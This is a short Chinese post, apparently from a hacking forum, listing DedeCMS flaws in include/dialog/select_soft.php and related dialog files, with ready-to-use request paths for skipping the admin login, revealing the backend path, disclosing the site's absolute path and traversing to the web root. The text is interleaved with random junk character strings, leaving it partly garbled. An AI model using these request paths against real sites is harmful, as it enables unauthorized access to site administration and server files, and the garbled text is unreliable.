1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
( R2 e7 ^6 g5 D- A# Q. _) \$ b X+ t
员帐号,新版本的就直接转向了后台.
7 H. R6 B! s3 w. B8 L# [ B8 z0 L* h9 g/ y8 M: R
2.include/dialog/config.php会爆出后台管理路径8 M ]: d, O$ n+ q+ q$ _/ u7 Z
" K* e9 T' D, `4 C& l+ y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
! T2 l z% C% t; o+ B! j% I, o
5 `7 I( `' c6 k4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.! X) S! M6 m' z8 J' f
8 F3 B6 Y' ^9 x; d6 z, G
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉0 U! ~( Z" h3 h# O1 ^( x
( r* }* a* f0 J$ T, a6 @ Y& z
到根目录去.不过这些版本的访问地址有些不同.+ p5 X5 U8 w5 G4 ?: w3 j
地址为require/dialog/select_soft.php?activepath=/././././././././! a& }3 M. P1 B
`. `1 R A: Y, B h9 t
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
" W0 @% \4 {; s9 e存在相同问题的文件还有
5 c# I; O* c$ S0 Winclude\dialog\select_images.php3 E$ x$ \2 I$ L
include\dialog\select_media.php
) Q1 P; o5 t0 [$ S9 finclude\dialog\select_templets.php1 K r; B, A( S( n7 x) _
|